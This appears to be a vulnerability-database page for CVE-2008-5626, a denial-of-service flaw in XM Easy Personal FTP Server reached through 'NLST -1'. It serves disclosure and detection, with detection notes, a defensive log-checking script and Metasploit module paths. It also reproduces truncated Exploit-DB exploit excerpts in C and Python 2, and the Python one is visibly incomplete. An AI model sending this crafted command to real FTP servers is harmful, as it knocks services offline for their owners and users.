CVE-2008-5626
Published 2008-12-17
Priority P4 (25) · CVSS 2.0 score 4 (medium), vector AV:N/AC:L/Au:S/C:N/I:N/A:P
Exploit available · EPSS 35.86% (98.3th percentile)
XM Easy Personal FTP Server 5.6.0 allows remote authenticated users to cause a denial of service via a crafted argument to the NLST command, as demonstrated by a -1 argument.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dxmsoft | xm_easy_personal_ftp_server | — | — |
| dxmsoft | xm_easy_personal_ftp_server | — | — |
Detection & IOCs (extracted from sources)
- Detect DoS attempts by monitoring for an authenticated FTP NLST command sent with a '-1' argument against XM Easy Personal FTP Server on port 21.
- Even anonymous FTP accounts can trigger the vulnerability if they have permission to call NLST; alert on NLST commands from anonymous sessions as well as authenticated ones.
- Monitor for FTP sessions that issue USER/PASS followed immediately by a bare or argument-bearing NLST command with no directory path, particularly with negative numeric arguments such as -1.
- The Metasploit auxiliary modules targeting this CVE are located at modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb and xmeasy570_nlst.rb; use these paths to identify exploitation attempts via Metasploit.
- Exploitation requires an authenticated FTP session; however, anonymous login is sufficient if the anonymous account has NLST permission enabled, so review and restrict anonymous FTP permissions on XM Easy Personal FTP Server.
- Both versions 5.6.0 and 5.7.0 of XM Easy Personal FTP Server are confirmed vulnerable; detections and mitigations should cover both version branches.
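The detection points above can be turned into a small session-aware log check. The following is an added example written for this page, not code from any of the indexed sources; it assumes a constructed FTP control-channel log format (timestamp, client IP, session id, command, optional argument, one accepted command per line) and flags an NLST whose argument is a bare negative integer inside a session that has completed USER/PASS, recording whether the login was anonymous and whether the NLST came immediately after PASS. Listing-style flags such as `-l` and a bare `NLST` are deliberately left alone so normal clients do not alert.

```python
import re
from typing import Dict, List

# Constructed sample log (assumed format, not from the page's sources):
# timestamp, client IP, session id, command, optional argument.
SAMPLE_LOG = """\
2008-12-17T10:00:01Z 198.51.100.7 s1 USER alice
2008-12-17T10:00:02Z 198.51.100.7 s1 PASS ********
2008-12-17T10:00:03Z 198.51.100.7 s1 CWD /pub
2008-12-17T10:00:04Z 198.51.100.7 s1 NLST
2008-12-17T10:00:10Z 203.0.113.5 s2 USER anonymous
2008-12-17T10:00:11Z 203.0.113.5 s2 PASS guest@example.invalid
2008-12-17T10:00:12Z 203.0.113.5 s2 NLST -1
2008-12-17T10:00:20Z 203.0.113.9 s3 USER bob
2008-12-17T10:00:21Z 203.0.113.9 s3 PASS ********
2008-12-17T10:00:22Z 203.0.113.9 s3 NLST -l
2008-12-17T10:00:30Z 203.0.113.9 s4 NLST -1
"""

LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<ip>\S+)\s+(?P<sid>\S+)\s+(?P<cmd>[A-Za-z]+)(?:\s+(?P<arg>.*))?$"
)
# A bare negative integer such as "-1"; listing flags like "-l" do not match.
NEGATIVE_INT = re.compile(r"^-\d+$")
ANONYMOUS_USERS = {"anonymous", "ftp"}


def find_nlst_dos_attempts(log_lines: List[str]) -> List[dict]:
    """Return one alert per NLST with a negative numeric argument that is
    issued inside an authenticated session (USER followed by PASS)."""
    sessions: Dict[str, dict] = {}
    alerts: List[dict] = []
    for raw in log_lines:
        m = LOG_LINE.match(raw.strip())
        if not m:
            continue  # not in the assumed format; skip it
        sid, cmd = m.group("sid"), m.group("cmd").upper()
        arg = (m.group("arg") or "").strip()
        st = sessions.setdefault(sid, {"user": None, "authed": False, "prev": None})
        if cmd == "USER":
            st["user"], st["authed"] = arg, False
        elif cmd == "PASS":
            # Assumption: only accepted commands are logged, so a PASS that
            # follows USER means the login succeeded.
            st["authed"] = st["user"] is not None
        elif cmd == "NLST" and st["authed"] and NEGATIVE_INT.match(arg):
            alerts.append({
                "timestamp": m.group("ts"),
                "client": m.group("ip"),
                "session": sid,
                "user": st["user"],
                "anonymous": (st["user"] or "").lower() in ANONYMOUS_USERS,
                "argument": arg,
                "right_after_login": st["prev"] == "PASS",
                "cve": "CVE-2008-5626",
            })
        st["prev"] = cmd
    return alerts


if __name__ == "__main__":
    for alert in find_nlst_dos_attempts(SAMPLE_LOG.splitlines()):
        print(alert)
```

On the sample above only session s2 alerts: it is an anonymous login followed directly by `NLST -1`. Session s4 sends the same argument without authenticating, which the server would refuse, so it is not reported; if you want such pre-auth attempts as a low-severity signal, drop the `st["authed"]` condition and carry that flag into the alert instead.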
GHSA-q855-r9x6-prhq (GHSA, unreviewed, 2022-05-17): CVE-2008-5626 [MEDIUM] XM Easy Personal FTP Server 5
XM Easy Personal FTP Server 5.6.0 allows remote authenticated users to cause a denial of service via a crafted argument to the NLST command, as demonstrated by a -1 argument.
GHSA-3vxp-49m8-73gc (GHSA, unreviewed, 2022-05-02, CVSS 4.0): CVE-2009-3643 [MEDIUM] Dxmsoft XM Easy Personal FTP Server 5
Dxmsoft XM Easy Personal FTP Server 5.8.0 allows remote attackers to cause a denial of service via a long argument to the (1) LIST and (2) NLST commands, a different issue than CVE-2008-5626 and CVE-2006-5728.
No detection rules found.
Exploit-DB (2009-03-27): CVE-2008-5626 XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service
Excerpt as indexed (the listing is truncated at both ends):
```c
/*
XM Easy Personnal FTP Server Syntax : \n",file);
fprintf(stdout,"=>Exemple : %s 127.0.0.1 21 login1 password1\n",file);
exit(0);
}
int main(int argc, char **argv)
{
if (argc < 4)
syntax(argv[0]);
int port = atoi(argv[2]);
int mysocket;
int mysocket2;
int srv_connect;
int sockaddr_long;
struct sockaddr_in sockaddr_mysocket;
sockaddr_long = sizeof(sockaddr_mysocket);
sockaddr_mysocket.sin_family = AF_INET;
sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);
sockaddr_mysocket.sin_port = htons(port);
char request[50];
char answer[200];
fprintf(stdout,"[+]Connect to Server %s\n",argv[1]);
mysocket2 = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket2 == -1){
fprintf(stderr,"[-]FAILED SOCKET\n");
return 1;}
srv_connect
```
Exploit-DB (2008-10-13): CVE-2008-5626 XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service
Excerpt as indexed (Python 2 script; the listing is truncated):
```python
print "--------------------------------------------------------------"
print "# XM Easy Personal FTP Server 5.6.0 Remote Denial of Service"
print "# url: http://www.dxm2008.com/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://www.shinnai.net"
print "--------------------------------------------------------------"
import socket
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    conn = s.connect(("127.0.0.1",21))
    d = s.recv(1024)
    print "Server USER: test"
    d = s.recv(1024)
    print "Server PASS: test"
    d = s.recv(1024)
    print "Server NSLT: -1"
    d = s.recv(1024)
    print "Server <- " + d
    time.sleep(2)
except:
    print "- Unable to connect. exiting."
# milw0rm.com [2008-10
```
Metasploit: XM Easy Personal FTP Server 5.7.0 NLST DoS
You need a valid login to DoS this FTP server, but even anonymous can do it as long as it has permission to call NLST.
Metasploit: XM Easy Personal FTP Server 5.6.0 NLST DoS
This module is a port of shinnai's script. You need a valid login, but even anonymous can do it as long as it has permission to call NLST.
No writeups or analysis indexed.
References:
- http://securityreason.com/securityalert/4766
- http://www.securityfocus.com/bid/31739
- http://www.vupen.com/english/advisories/2008/2803
- https://www.exploit-db.com/exploits/6741